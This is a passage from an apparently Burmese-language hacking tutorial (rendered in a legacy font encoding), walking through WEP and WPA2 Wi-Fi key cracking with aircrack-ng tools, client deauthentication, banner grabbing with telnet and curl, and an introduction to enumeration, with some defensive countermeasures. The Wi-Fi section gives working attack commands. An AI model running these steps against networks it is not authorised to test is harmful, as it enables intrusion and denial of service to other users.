aocsmwJh yrmPxdapmifhqdkif;zdkY vdktyfygw,f/ vdktyfwJhtajctaeudk a&mufjyDrdkY
aemufxyf terminal wpfck xyfzGifhygr,f/

aemufzGifhxm;wJh terminal rSm aireplay-ng -1 0 -a (MAC) mon0 vdkY

&dkufjyD; enter &ygr,f/

txufygtwddkif; Authentication request send aewmudk

awGYjrif&rSmjzpfjyD; ACK awG &&Sdae&muae Association successful jzpfoGm;&if

txufygtwdkif; Authentication successful jyDjzpfvdkY ay:vmr,fh

command line rSm atmufygtwdkif; qufvufvkyfaqmif&ygr,f/

txl;taxGawmhr[kwfygbl;/ Association udk Zero ae&mrSm 1

ajymif;vdkufwmav;ygyJ/

'Dae&m oifhtaeeJY txufygyHkxJuvdk mon0 is on channel 8, but the

AP uses channel 10 qdkjyD; error eJY &yfoGm;wmrsdK; BuHKEdkifygw,f/
bmaMumifhvJqdkawmh Access Point onf Channel ajymif;vJwwfaomaMumifh
jzpfygw,f/ aemufwpfBudrfxyfvkyfMunfhyg/ aemufwpfck xyfajymif;aewmudk
jrif&ygr,f/

'DtajctaerSmawmh a&SUrSmzGifhxm;cJhwJh Terminal wpfckudk

ydwfvdkuf&ygr,f/ txufyHkyg Terminal udk rSwfrdOD;r,fxifygw,f/ tJ'gudk
ydwfvdkufygr,f/ a&SUqHk;avmufrSm zGifhcJhwJh Terminal yg/

ckqdk&ifawmh cke 0 ae&mrSm 1 ajymif;xm;wJh command

tvkyfvkyfaeygjyD/ cke Data 2000 ausmfatmif apmifhcJhwJh Terminal rSmvnf; Data
awG xyfwufvmwmudk awYG&ygr,f/

aemufxyf Terminal wpfck xyfzGifhjyD; aireplay-ng -3 -b (BSSID/MAC)

mon0 udk &dkufxnfh&ygr,f/ (BSSID = MAC add of Wifi)/ -b u BSSID udk
oHk;r,fvdkY ajymwmyg/

Terminal awGrSm Data a&m Beacons awGrSmyg udef;*Pef;awG

vsifjrefpGm wufvmwmudk awGY&ygr,f/ aemufqHk;zGifhxm;wJh Terminal rSmawmh
ARP request awG&&SdzdkY vkyfaqmifaewmudk awGY&rSmyg/ real world rSmuawmh AP
eJY connect vkyfxm;wJh Device awG &SdwmaMumifh tcsdefydkjrefygvdrfhr,f/

uRefawmfhqDrSmawmh ARP request u ckxd r&ao;ygbl;/ ARP request

tjref atmifjrifzdkYtwGuf network rSmcsdwfqufaewJh client wpfvHk;udk
disconnect jzpfjyD; reconnect jyefvkyf&atmif vkyfzdkY vdkygw,f/ vkyfEdkif&if
ydkvG,foGm;jyDaygh/ 'gu client wpfvHk;vHk;udk DoS wdkufcdkufrI pwifwmrsdK;eJY
qifwlygw,f/

txufyg command udk toHk;jyKjyD; client udk deauthenticate jzpfatmif

vkyfEdkifygw,f/ APMAC ae&mrSm Access Point's MAC (BSSID) udk
xnfhoGif;&ygr,f/ -a u AP udk qdkvdkjyD; -c uawmh client udk udk,fpm;jyKygw,f/
-c aemufu clientMAC qdkwmuawmh cP&yfjyD; jyefvnfcsdwfqufatmif
aqmif&GufapvdkwJh client &JU MAC address yg/ vuf&SdoHk;aeolawGudk
b,fvdkMunfh&rvJ rajymawmhbl;aemf/
ckqdk&ifawmh cke bmrS r&ao;wJh ARP request awGudk vufcH&&SdvmjyD
jzpfygw,f/ atmufyg yHktwdkif; &&Sdvmwmudk jrif&rSmyg/
 txufygyHkrSmawmh ARP request packet aygif;rsm;pGmudk
awGYjrifEdkifygw,f/ 'Dtajctaexda&muf&if aemufxyf Terminal wpfck
xyfzGifhyg/ aircrack-ng udk oHk;ygr,f/

capture udk specify vkyfrSmrdkYvdkY aircrack-ng capture1-0 vdkY &dkufjyD; Tab

udk ESdyfvdkuf&if (enter rvkyfao;yg) txufygyHktwdkif; capture file name awGudk
jyygr,f/ capture1-01.cap udk toHk;jyKygr,f/

capture1-01.cap udk xnfhoGif;jyD; enter vdkufygw,f/

 &vmwJh result u Failed. Next try with 5000 IVs. vdkY awGY& ygw,f/
tm;avQmhp&mrvdkygbl;/ uRefawmfwdkYrSm capture aemufwpfzdkif usefao;ygw,f/
capture1-02.cap udk toHk;jyKMunfhwmaygh/

capture1-02.cap udk jznfhoHk;vdkufygjyD/

'Dcgawmh uRefawmfwdkY atmifjrifoGm;ygjyD/ KEY FOUND!

[ 31:32:33:34:35 ] (ASCII: 12345) Decrypted correctly: 100% qdkjyD;
awGYjrif&jyD jzpfygw,f/ WEP encryption rSm 64bit eJY 128bit &Sdygw,f/ 64bit
uawmh small key jzpfjyD;awmh bmyJ oHk;xm;wm; &ygw,f/ 12345 or abcdef
ponfjzifhaygh/ 128bit twGufuawmh tcsdefenf;enf; ydkay;&rSmyg/ 'Dae&mrSm
&yfvdkuf&atmifcifAs/ aemufxyf WPA2-PSK udk qufjyD; aqG;aEG;&atmifyg/

WPA and WPA2

WPA eJY WPA2 udk cracking vkyfzdkYuawmh odyfjyD; uGmjcm;rI r&Sdayr,fh
WEP cracking eJYawmh rwlnDygbl;/ tawmfhudk uGmjcm;ygw,f/ airmon-ng eJYyJ
pwifvdkuf&atmif/

interface vnf; odjyD;om;rdkY wlan0 udk wef;jyD; xnfhvdkufwmyg/

airmon-ng start wlan0 vkyfvdkufwJhtcg wlan0 (wifi) aysmufoGm;ygr,f/ mon
(monitor mode) xJudk a&mufoGm;vdkY jzpfygw,f/
 jyóemay;aewJh process ESpfckudk &Sif;vdkufygw,f/ kill PID yHkpHeJYyg/
txufyg yHkrSm MunfhEdkifygw,f/

odjyD;om; command yg/ wifi vdkif;awGudk &SmazGzdkYtwGuf jzpfygw,f/

monitor mode xJ a&mufaewmrdkY wlan0mon jzpfoGm;wmudk owdjyKyg/

pwif &SmazGaeygjyD/ 'Dae&mrSmawmh &Sif;atmif wpfvdkif;yJ

jyxm;ygw,f/ Test qdkwJh emrnfeJY/

yHkrSmjyefMunfh&if BSSID, CH, ... pwmawGudk awGY&ygr,f/ ENC rSm

Munfhawmh WPA vdkY awGY&ygw,f/

Target awGYjyDrdkY Control+c udk ESdyfjyD; &yfvdkufygr,f/ Test qdkwJh wifi

vdkif;twGuf BSSID udk copy ,lxm;yg/ CH u 1 yg/ WPA Key awGudk crack
zdkYtwGufawmh Password List zdkif vdktyfygw,f/

oHk;vdkufwmu airodump-ng -c 1 (CH u 1 rdkY) --bssid

02:2B:32:9E:C2:A4 (rdrdwdkY Target &JU BSSID udk xnfhoGif;&rSmyg) -w Desktop/
qdkwmuawmh odjyD;wJhtwdkif;ygyJ/ Desktop ay:udk vrf;nTefvdkufwmaygh/
wlan0mon udkawmh rajymawmhbl;aemf/

File udk zGifhMunfhwJhtcg Desktop ay:rSm ckvdk zdkifawG wufvmwmudk

jrif&rSmjzpfygw,f/ airodump udk toHk;jyKjyD; aircrack suit uae zefwD;vdkufwJh
zdkifawG jzpfygw,f/

terminal rSm MunfhMunfh&ifvnf; AP twGuf handshake udk &SmazGEdkifzdkY

BudK;pm;aewmudkawGY&ygr,f/ WPA & WPA2 rSm Data count u ta&;rygygbl;/
Handshake uom ta&;ygygw,f/ 'gaMumifh Handshake udkyJ t"du
OD;pm;ay;&rSmyg/ Terminal aemufwpfck xyfzGifhygr,f/
 network eJY csdwfqufoHk;aeol
vuf&SdrSm wpfa,mufa,muf&JU Mac
address (STATION) udk copy ul;ygr,f/

aireplay-ng -0 2 -a BSSID -c ClientMAC wlan0mon udk oHk;vdkufwmyg/

Terminal ESpfck ,SOfjyxm;&mrSm tay:u terminal &JU nmbufaxmifh

tay:bufrSm WPA handshake qdkwmudk awGYvm&ygvdrfhr,f/ ckqdk&ifawmh
Desktop ay:rSm cke awGYxm;wJh zdkifawGxJu -01.cap zkdifudk crack vdkY &ygjyD/
crack EdkifzdkYtwGuf aemufxyf Terminal wpfckudk zGifhyg/ (rzGifhcif
BudKajymxm;vdkwmu uRefawmfh&JU wordlist file uav;udk Home directory xJrSm
xm;xm;ygw,f/ File udk zGifh&if yGifhvmvmcsif; ae&mrSmyg/ passwords.txt qdkwJh
zdkifemrnfeJY jzpfygw,f)

toHk;jyKoGm;wmu aircrack-ng -a 2 -b (bssid) -w (password file)

Desktop/(.cap file name) jzpfygw,f/ uJ enter vdkufjyD/ bmawG &vmrvJ
Munfh&atmif/
 KEY FOUND qdkjyD; awGY&ygjyD/ Password u thisistesting jzpfygw,f/
tJ'gudk password ae&mrSm &dkufxnfhvdkuf&HkeJY tJonf wifi vdkif;udk uRefawmfwdkY
toHk;jyKEdkifjyDjzpfygw,f/
'Denf;vrf;u Password list file ay: rlwnfygw,f/ rdrdwdkY&JU Password
list rSefuefrSomvsif &rSmjzpfjyD; Brute Force jyKvkyfwJhenf;udkvnf; toHk;jyKEdkifay
r,fh tcsdef tawmfhudk MumjrifhEdkifygw,f/ Complete wordlist wpfckckudk
oHk;wmuawmh ydkjyD; aumif;rGefEdkifygw,f/ wordlist awGuvnf; wpfEdkifiHeJY
wpfEdkifiH tajccHcsif; tac:ta0:csif; bmompum;csif; uGmjcm;wmaMumifh
tcsdKUae&mawGrSm tcuftcJ &Sdwwfygw,f/ 'ghjyif Wordlist wpfckonf
vpf[muGufr&Sdatmif jynfhpHkjyDqdkygvsifawmh 4TB cefYavmufxd zdkifqdk'f
&SdEdkifygao;w,f/ 'gaMumifh jzpfEdkifacs&SdwJh Wordlist file av;awGudk zefwD; (&,l)
jyD; oHk;Edkifygw,f/ Brute Force taMumif;udk aemufrSm qufygOD;r,f/
(Monitor mode aMumifh wifi jyefray:&ifawmh 'Dvdkav;om
vkyfvdkufyg)
CHAPTER 15: Banner Grabbing

Introduction

a&SUtcef;rSm vkyfaqmifp&mawGudk xnfhoGif;aqG;aEG;jyD;jyDrdkY

'Dtcef;rSmawmh rSwfom;p&mawGudk wpfvSnfh jyefaqG;aEG;&atmifyg/
'Dtcef;uvnf; ta&;ygwJh u@wpf&yfjzpfwmrdkY odrSwfxm;avav
tusdK;&SdavavygyJ/
Administrator wpfa,muftaeeJY ajym&r,fqdk&ifawmh uRefawmfwdkYu
uRefawmfwdkY&JU Server awGeJY Software awG? network awGudk Attacker awG&JU
&efuae umuG,fay;&rSmjzpfygw,f/ uRefawmfwdkYu uReffawmfwdkY&JU network
environment rSm jzpfEdkifacs&SdwJh Threat awGeJY olwdkYudk ajz&Sif;Edkifr,fh
enf;vrf;awGudk od&Sdxm;zdkYvnf; vdktyfygw,f/
uRefawmfwdkY od&Sdxm;wJhtwdkif;ygyJ/ hacker awG[m enf;ynm
trsdK;rsdK;udk toHk;jyKjyD;awmh uRefawmfwdkY&JU web, network, server eJY service
pwmawGeJY ywfoufwJh information awGudk &,lpkaqmif;zdkY BudK;pm;aeMuygw,f/
Hacker awG toHk;jyKavh&SdMuwJh enf;ynmtrsm;pk[m ausmfMum;
ygw,f/ 'gaMumifh vlodrrsm;r,fh attack vkyfEdkifr,fh enf;vrf;opfawG? malicious
code inject vkyfEdkifr,fh enf;vrf;opfawGeJY uRefawmfwdkY&JU network, system
pwmawGudk xdef;csKyfEdkifr,fh unauthorized access &,lEdkifr,fh enf;vrf;opfawG
pwmawGudk wdwfwqdwf &SmazGavhvmaeMuygw,f/
uRefawmfwdkY&JU system awGxJudk 0ifa&mufEdkifzdkYtwGufawmh
Vulnerability awGu attacker awGudk ulnDay;ygw,f/ Vulnerability
awGxJrSmrSm ,aeYxd &SmazGawGY&Sdjcif; r&Sdao;aom Vulnerability awGudkawmh
Zero-day-vulnerability vdkY ac:qdkjyD; System wdkif;rSm &SdaeEdkifygw,f/
Vulnerability topfwpfckudk &SmazGawGY&SdjyDqdk&ifawmh xdk vulnerability udk
wdkufcdkufEdkifr,fh exploit awGudk pOf;pm;azmfxkwf&ygw,f/ exploit wpfckudk
azmfxkwfEdkifjyDqdk&ifawmh zero-day-exploit vdkY ac:qdkygw,f/ Zero-day qdkwmu
Developer awGtaeeJY owdrxm;rdao;wJh tm;enf;csufawGuae wkdufcdkufcH&
EdkifwmjzpfjyD; xdkodkYwdkufcdkufvmwJhtcg BudKwif od&Sdrxm;jcif;aMumifh jyifqifcsdef
r&jcif; (or) zero-day jyifqifcsdef jzpfwmaMumifh ac:qdkjcif;jzpfygw,f/
Vulnerability topfwpfck &SmawGYjyD exploit vnf;&SdjyDqdk&ifawmh
zero-day-vulnerability & zero-day-exploit vdkY ac:qdkvdkY&ygw,f/ 'gayr,fh
rwdkufcdkuf&ao;wJhtajctaerSmrS jzpfygw,f/ tu,fí xdk vulnerability eJY
exploit udk toHk;jyK wdkufcdkufvdkufw,f/ tJvdk yxrqHk; pwifwdkufcdkufwJh
wdkufcdkufrIawGudk Zero-day-attack vdkY ac:qdkMuygw,f/ Vulnerability vnf;odjyD?
Attack vkyfEdkifr,fh Exploit vnf;&SdrSef;odjyD/ wdkufcH&wJholawGuae jzpfap? rlv
xkwfvkyf&mae&mu jzpfap? Government rS jzpfap xdkcdkufrItwGuf Solution
(patch) wpfckudk xkwfvkyfay;vdkufEdkifjyDqdk&ifawmh xdk attack udk Zero-day-attack
vdkY ac:qdkvdkY r&awmhovdk xdk vulnerability udkvnf; Zero-day-vulnerability vdkY
ac:qdkvdkY r&awmhygbl;/ bmaMumifhvJqdk&ifawmh vulnerability & exploit udk
tjcm;olawG od&SdoGm;jyD; BudKwifumuG,frIvnf; vkyfxm;EdkifawmhrSmrdkY jzpfygw,f/
'guawmh tusOf;csKyfazmfjyaqG;aEG;jcif;yg/ qufjyD; aqG;aEG;&atmif/

What is Banner Grabbing?

Banner Grabbing qdkwm System wpfckay:rSm running vkyfaewhJ
Operating System eJY service awGeJY ywfoufqufEG,fwJh tcsuftvufawGudk
&,lpkaqmif;wJh enf;ynmvdkY tBurf;tm;jzifh owfrSwfEdkifygw,f/ Telnet
odkYr[kwf tjcm;oifhawmfwJh program wpfckckudk toHk;jyKjyD;awmh Banner
grabbing vkyfaqmifEdkifygw,f/
'Dvdk vkyfaqmifEdkifzdkYtwGuf yxrqHk;taeeJY remote machine wpfckckeJY
connection wpfckudk t&ifqHk; vkyf&ygr,f/ connection wpfck &jyDqdk&ifawmh Bad
request vkdY ac:wJh request aygif;pHkudk ydkYaqmifEdkifygw,f/ 'Dvdkvkyfaqmifjcif;[m
banner message awG response jyefvmapr,fh vulnerable host wpfckckudk
jzpfapEdkifygw,f/
Banner message awGrSmawmh system udk xdef;csKyfEdkifzdkY BudK;pm;&mrSm
toHk;jyKEdkifr,fh information awG yg0ifaeygw,f/ Banner qdkwJh pum;vHk;udk
em;vnfvG,fatmif ajym&&ifawmh tjcm; program wpfckckuae csdwfqufzdkY
BudK;pm;wJhtcgrSm xkwfvTwfay;wJh service udk message taeeJY azmfjywm
jzpfygw,f/ jrifomatmifajym&&if uRefawmfwdkYawG WebPage awGudk
0ifa&mufwJhtcg aMumffjimawG xnfhxm;wmudk awGYjrifEdkifrSmyg/ tJ'gawGudk
banner vdkY ac:avh&SdMuygw,f/ tJonf banner av;awGrSm aMumfjimukefpnf
awGtaMumif;eJY qufoG,f&r,fhvdyfpmawG pwJh message awG yg0ifaeovdkygyJ/
Default Banner awGrSm software version eHygwfawGvdkrsdK; service eJY
oufqdkifwJh information awGtaMumif; pwmawG yg0ifaeygw,f/ HTTP (Hyper
Text Transfer Protocol) service twGuf banner awGrSmqdk&if server software
type, version number, aemufqHk; modify vkyfcJhwJh Date & time pwJh information
awGeJY tjcm;tcsuftvufrsm;pGm yg0ifaeygw,f/ Telnet vdk program rsdK;udk
toHk;jyKjyD;awmh tJonftcsuftvufawGudk &SmazG&,lEdkifygw,f/ xdkodkY
&,lvkyfaqmifjcif;udk Banner Grabbing vdkY ac:qdkygw,f/
Banner Grabbing vkyfaqmifzdkYtwGuf telnet tjyif tjcm; program
awGvnf; &Sdaeygao;w,f/ Telnet onf network type protocol wpfrsdK;jzpfjyD;
remote host uae virtual terminal connection tjzpf pwifvkyfaqmifEdkifygw,f/
Operating System trsm;pkrSm Telnet session vkyfaqmifEdkifr,fh vdktyfcsufawG
jynfhpHkwmaMumifh Telnet udk toHk;jyKjcif;uawmh Banner Grabbing twGuf
primary way vdkY qdkEdkifygw,f/ host wpfckckqD csdwfqufjcif;jzifh banner awGudk
grab vkyfEdkifygw,f/ (&,lEdkifw,f qdkygawmh)/ jyD;awmh service
awGeJYtwl ,SOfwGJaewJh port awGqDudk request awG ay;ydkYEdkifygw,f/ Oyrm -
HTTP twGuf port 80 ponfjzifhaygh/
ar;p&mav;wpfck &Sdaeygw,f/ Banner Grabbing udk Hacker awGyJ
vkyfavh&Sdygovm;/ r[kwfygbl;/ wu,fawmh system administrator
awGonfvnf;yJ olwdkY wm0ef,lxm;&wJh host ay:rSm operate vkyfaewJh different
sercice and systems awG tm;vHk;&JU inventory awGudk pkaqmif;EdkifzdkYtwGuf
toHk;jyKMuavh&Sdygw,f/ White Hat Hacker awGonfvnf;yJ Penetration test &JU
Planning Phase rSm Banner Grabbing udk toHk;jyKavh&Sdygw,f/
Malicious Hacker awGuawmh Vulnerable host awGudk &SmazG&mrSm
Banner Grabbing udk trsm;qHk; toHk;jyKMuavh&Sdygw,f/ default banner rSm
server software type & version awG yg0ifwJhtaMumif; aqG;aEG;jyD;jyDaemf/
'gaMumifh xdk oufqdkif&m software awG tvdkuf jzpfay:aewJh vulnerability awGeJY
exploit awGudk od&Sd&,ltoHk;jyKEdkifMuygao;w,f/
a&SUrSm aqG;aEG;cJhwmawGxJrSm Information Gathering 7 steps udk
rSwfrdOD;r,fxifygw,f/ a&SUajcmufcku Active & Passive Footprinting
jzpfjyD;awmh aemufqHk; eHygwf 7 tcsufu Enumeration jzpfw,fqdkwm
uRefawmfwdkY aqG;aEG;cJhjyD;ygjyD/ Banner Grabbing qdkwmu network ay:rSm
&SdaewJh computer system awGtaMumif;eJY port awGay:rSm running vkyfaewJh
service awGtaMumif; information awGudk pkaqmif;&mrSm toHk;jyKwJh
Enumeration Technique wpfck jzpfygw,f/ toHk;jyKwJh t"du &nf&G,fcsufu
vulnerable ports awGeJY wdkufcdkuf&r,fh exploit awGudk od&SdEdkifzdkYyJ jzpfygw,f/
Banner grabbing twGuf toHk;jyKavh&SdwJh port awGudk erlem
azmfjy&&if HTTP (Hyper Text Transfer Protocol) twGuf port 80, FTP (File
Transfer Protocol) twGuf port 21, SMTP (Simple Mail Transfer Protocol)
twGuf port 25 pwmawGyJ jzpfygw,f/ a&SUrSmaqG;aEG;cJhovdkygyJ/ Banner
grabbing vkyfaqmifEdkifzdkYtwGuf trsm;qHk;toHk;jyKavh&Sdwmu Telnet jzpfjyD; OS
tawmfrsm;rsm;rSm yg0ifjyD;om;jzpfygw,f/ tjcm; toHk;rsm;wJh tool wpfckuawmh
Netcat tool jzpfygw,f/

Types of Banner Grabbing

grab vkyfMunfhwJhtcg t"dutm;jzifh enf;vrf; ESpfrsdK; vkyfaqmifMu
avh&Sdygw,f/ trsm;qHk;toHk;jyKwJhenf;vrf;uawmh remote host ay:udk wdkuf&dkuf
vSrf;csdwfwmrsdK; jzpfygw,f/ Banner grab vkyfEdkifzdkYtwGuf txl;pDrHxm;wJh TCP
packet awGudk ay;ydkY&ygw,f/ Operating system ay:rSm TCP/IP stack awGudk
implement vkyfpOfrSm xkwfvkyfolawG&JU t"dyÜg,f aumuf,lrI uGJjym;wJhtay:
rlwnfjyD; response awGonfvnf;yJ uGJjym;rI &SdEdkifygw,f/ 'gaMumifh special
crafted packet awGudk ay;ydkYjyD;wJhaemuf jyefvnf&&Sdvmr,fh Response awGudk
response database eJY EIdif;,SOf&ygw,f/
Oyrm - Nmap rSm Operating System fingerprint (or) Banner
Grabbing udk tqifh 8 qifheJY aqmif&Gufygw,f/ tJonftqifh 8 qifhudk T1, T2
uae T7 txd 7 ckeJY usefwpfckudk PU (Port Unreachable) vdkY owfrSwf
ac:qdkygw,f/ xdk test awG&JU tao;pdwfudk www.packetwatch.net rSm
oGm;a&muf Munfh&IEdkifygw,f/ ('Dae&mrSmawmh pmrsufESmt& csefcJhvdkufyg&ap)
Banner Grabbing vkyfwJhae&mrSm toHk;rsm;qHk;u Active Banner
Grabbing jzpfygw,f/ 'gayr,fh tcsdefwdkif; Active jzpfae&rSmawmh r[kwfygbl;/
Active Banner Grabbing rSm target remote host udk Scan p&m rvdkygbll;/
Passive Banner Grabing udkawmh OS awGu packet awGudk b,fvdk response
jyefw,fqdkwJhay:rSm tajccHjyD; zefwD;xm;vkyfaqmif&ygw,f/ Passive Banner
Grabbing rSmu target host rS packet awGudk capture (zrf;,l) &mrSm sniffing
enf;vrf;udk toHk;jyKvkyfaqmifygw,f/ jyD;wJhtcg &&SdvmwJh packet awGudk
avhvmjyD; Operating System, version, using programs & their version, port
pwmawGtm; cefYrSef;Edkifapr,fh information awGudk &SmazG& ygw,f/
xdkuJhodkY OS udk cefYrSef;&mrSm tcsufav;csufudk toHk;jyKavh&Sdygw,f/
yxrtcsufu Time-To-Live (TTL) jzpfygw,f/ OS awGonf outbound packet
awGay:rSm time-to-live udk jyKvkyfygw,f/ 'kwd,tcsufu Window size yg/
wwd,tcsufu OS uae owfrSwfxm;wJh DF flag udk Munfh&rSmjzpfjyD; DF flag
u "Don't Fragment bit" vdkY qdkvdkygw,f/ aemufqHk;tcsufu OS uae
ay;xm;wJh service udk Munfh&IEdkifzdkYyg/ 'D signature av;csufay:rlwnfjyD;
qHk;jzwf&ygw,f/ OS udk identify vkyf&mrSm 'Dav;csufudkom Munfh&I qHk;jzwf
&r,fvdkY vHk;0 rqdkvdkyg/ 'Dav;csuftjyif information gathering tqifhrSm
&&SdcJhwJh tcsuftvufawGudkvnf; xnfhoGif;pOf;pm;Edkifygw,f/ tao;pdwfudk
www.honeynet.org/papers/finger rSm oGm;a&muf avhvmEdkifygw,f/
Banner Grabbing Tools
Banner Grabbing vkyfaqmifzdkYtwGuf tool tcsdKU &Sdygw,f/ IS Serve,
Netcat, Nmap, Netcraft eJY Telnet wdkY jzpfygw,f/ wpfckcsif;pDudk tusOf;cskKyf
azmfjyay;oGm;ygr,f/
ID Serve udkawmh rnfonfh Website server software udkrqdk Make,
Model, Version pwmawGudk cGJjcm;EdkifzdkYtwGuf toHk;jyKygw,f/ user awGu
rjrifEdkifaomfvnf; web query awGudk reply zdkYtwGuf xdk information awGudk
preamble (BudKwifazmfjycsuf) tjzpf ay;ydkYavh&Sdygw,f/ ID Serve onf
non-HTTP internet servers (e.g. FTP, SMTP, POP, NEWS, ...) udkvnf;yJ
csdwfqufEdkifpGrf;&Sdygw,f/ xdk non-HTTP internet server awG[m numeric status
code awG yg0ifaewJh line (pmaMumif;) awGudk xkwfay;EdkifjyD; Human readable
greeting tjzpfvnf;yJ qufoG,fvmwJh client awGtwGuf
xkwfay;Edkifygao;w,f/ ID Serve u rnfonfh greeting message udkrqdk
vufcHEdkifjyD; report vnf; ay;Edkifygw,f/ reverse DNS lookup udkvnf;yJ
jyKvkyfEdkifygao;w,f/ ID Serve onf remote server eJY port awGudk
csdwfqufzdkYtwGuf Standard Windows TCP udk toHk;jyKxm;ygw,f/ 'gaMumifh
connection wpfck atmifjrifrI &Sd r&Sdudk azmfjyay;Edkifygw,f/ connection wpfck
rjyD;ajrmufoGm;bl;qdk&if ID Serve rSm the port is closed or stealth qdkwJh message
rsdK;udk awGY&ygr,f/
Netcraft (anti-phishing community) onf community xJrSm phishing
attack awGudk umuG,fay;EdkifpGrf;&Sdygw,f/ Netcraft website onf Operating
System eJY web server version awGudk &SmazGEdkif&efftwGuf web server awGudk
tcgtm;avsmfpGm ppfwrf;aumuf,lavh&Sdygw,f/ 'gaMumifh Hacker awGu
Netcraft uaewpfqifh toHk;0ifwJh information awGudk &&SdEdkifygw,f/ spoof
vkyfxm;wJh web server awG&JU&efu uif;a0;apzdkYtwGuf&,f phishing &efuae
umuG,fzdkYtwGuf&,f anti-phishing & web server verification tool tjzpf
Netcraft udk toHk;jyKEdkifygw,f/
Netcat uawmh network connection uaewpfqifh data awGudk read &
write vkyfEdkifwJh networking utility wpfck jzpfygw,f/ Netcat onf TCP/IP or
UDP udk toHk;jyKEdkifjyD; tjcm;aom program awGuae vG,fulpGm
oHk;pGJEdkifapzdkYtwGuf reliable "back-end" tool wpfcktjzpf zefwD;xm;ygw,f/
outbound & inbound connection, TCP or UDP, from port to port pwJh function
awGudk toHk;jyKEdkifapr,fh access udk provide vkyfay;wmaMumifh oHk;vdkYaumif;wJh
tool wpfckvnf; jzpfygw,f/ Netcat rSm UDP to TCP udk aumif;rGefpGm vkyfaqmif
EdkifwJh tunneling mode yg&SdjyD;awmh network parameter awGudkvnf; specify
vkyfEdkifrSm jzpfygw,f/ website wpfckckudk Banner Grabbing vkyf&mrSm Netcat
udkvnf; toHk;jyKEdkifygw,f/
Telnet onf user command wpfck jzpfjyD; remote computer awGudk
access &,lEdkifzdkYtwGuf TCP/IP protocol atmufrSm tvkyfvkyfaqmifygw,f/
Windows rSmvnf; Build-in yg0ifygw,f/ Telnet udk toHk;jyKjyD; system
administrator (or) other user awG[m tjcm;aom uGefysLwmawGudk remotely
access &,lEdkifygw,ff/ Web rSmqdk&ifvnf; HTTP & FTP awG[m remote
computer u zdkiftcsdKUudk xdkuGefysLwmrSm Login 0ifp&mrvdkbJ request
vkyfcGifhay;wmudk awGY&ygr,f/ 'ghjyif privileges awGr&SdygbJvsuf omref user
wpfa,muftaeeJY xdkuGefysLwmay:u a'wmawGudk &&SdEdkifovdk specific
application awGxJudkvnf; Log in 0ifa&mufEdkifygao;w,f/
Nmap uawmh a&SUrSmvnf; uRefawmfwdkY oHk;cJhzl;ygw,f/ 'gaMumifh
tus,frajymvdkawmhygbl;/

Banner Grabbing using Telnet

Telnet udkoHk;jyD; Banner grab Munfh&atmifyg/ Banner Grabbing [m
website awG&JU wHcg;udk acgufzdkYtwGuf tvsifjrefqHk; enf;vrf; jzpfygw,f/ Kali
Linux &JU Terminal udk zGifhvdkufygr,f/

yxrqHk; pzGifhvdkufwmu telnet (target) 80 yg/ 80 u port 80 (HTTP)

udk &nfnTef;ygw,f/ target udk www.hak5.org udk erlem jyxm;ygw,f/
txufygtwdkif; enter vdkufygu atmufygtwdkif; jrif&ygr,f/

'DtqifhrSmu vufoGufzdkYawmh vdktyfygw,f/ Escape character

pmaMumif; ay:vmvmcsif;yJ 'Dvdk quf&dkufyg/

&dkuf&rSmu Get / HTTP/1.0 yg/ tjref&dkufjyD; enter 2csuf qif;yg/

'gqdk&ifawmh atmufygyHktwdkif; jrifawGYvm&ygvdrfhr,f/
 'DtcsuftvufrsdK; MunfhvdkY&EdkifwJh aemufxyf enf;vrf;wpfck ajymjyyg
OD;r,f/

oHk;oGm;wmu curl -I (target):80 yg/

txufygyHktwdkif; result udk jrifawGY&ygr,f/ ydkjyD; zwfvdkY vG,fovdk

aumif;rGefwJh tcsuftvufawG xGufay:vmwmudk jrifawGYEdkifygw,f/ ESpfckvHk;rSm
uRefawmf erlem jycJhwmu HTTP twGuf port 80 udkcsnf;yJ jycJhwmaemf/ tjcm;
port awGtwGuf rdrdwdkYbmom quf&SmMunfhyg/ Oyrm -
SSH = port 22
Telnet = port 23
SMTP or mail = port 25
Domain = port 53
Pop3 = port 113
Imap = port 143
HTTPS = port 443
Imaps = port 993
Pop3s = port 995
MySQL = port 3306

Countermeasures
Attacker awGonf Banner grabbing technique udk toHk;jyKjyD;awmh
uRefawmfwdkY&JU device type, OS, application & version, ... pwJh
tcsuftvufawGudk &SmazGzdkY BudK;pm;Muygw,f/ pkaqmif;&&SdwJh tcsuftvufawG
ay: rlwnfjyD; uRefawmfwdkY&JU system udk known exploit awGeJY wdkufcdkufvm
Edkifygw,f/ known exploit awG[m vulnerability udk fix vkyfEdkifzdkYtwGuf
xkwfay;xm;wJh patch file awGudk oHk;rxm;wJh system awGudk wdkufcdkufEdkifqJ
jzpfygw,f/
'gaMumifh BudKwifumuG,fwJhtaeeJY uRefawmfwdkY&JU web awGrSm banner
awGudk vGJrSm;azmfjyxm;Edkifovdk vulnerability fix jzpfwJh patch solution
awGudkvnf; yHkrSef vkyfaqmifoifhygw,f/ 'ghjyif Hacker awG[m vulnerable port
awGudkvnf; &SmazGwdkufcdkuf wwfwmaMumifh rdrdwdkY&JU website awG (web server)
awGrSm r&Sdrjzpf vdktyfwJh port awGuvGJ&if usefwmawGudk ydwfxm;oifhygw,f/
aemufjyD; file extension awGuvnf; server technology eJY ywfoufwJh
information awGudk ay;Edkifygw,f/ 'gaMumifh file extension awGudk hide
xm;jcif;[mvnf; aumif;rGefwJh vkyfaqmifcsuf jzpfygw,f/ .asp udk .htm eJY
tpm;xdk; toHk;jyKjcif; (odkYr[kwf) server udk identify vkyfEdkifwmawGudk
vrf;vTJxm;jcif; pwmawGudkvnf; vkyfaqmifEdkifygao;w,f/ Apache user
awGtaeeJYuawmh mod_negotiation directives awGudk toHk;jyKEdkifjyD; IIS user
awGuawmh PageXchanger vdk tool awGudk oHk;jyD; file extension awGudk manage
vkyfEdkifygw,f/
CHAPTER 16: Enumeration

Introduction

Enumeration u target network ay: yxrqHk; pwif wdkufcdkufwJh

attack vdkY qdk&ygr,f/ active taetxm;eJY connect jyKvkyfjcif;jzifh target
machine eJY ywfoufwJh information awGudk pkaqmif;wmjzpfvdkY olYudk
Information Gathering step xJ xnfhoGif;xm;jcif; jzpfygw,f/ enumeration
qdkwm system, user eJY administrator account awGudk identify vkyfjcif;udk
qdkvdkygw,f/ vulnerability awG &SmazG&mrSm eJY exploit pOf;pm;&mrSm attacker udk
tultnDay;Edkifr,fh information awGudk &,lEdkifzdkYtwGuf local network rSm
target eJY active connection jyKvkyfjcif;vnf; jzpfygw,f/
Enumeration rSm extract vkyfzdkY vdktyfwJh information awGuawmh user
names, groups, computer names, MAC addresses, DNS records, SNMP
informations, shares,... pwmawGyJ jzpfygw,f/

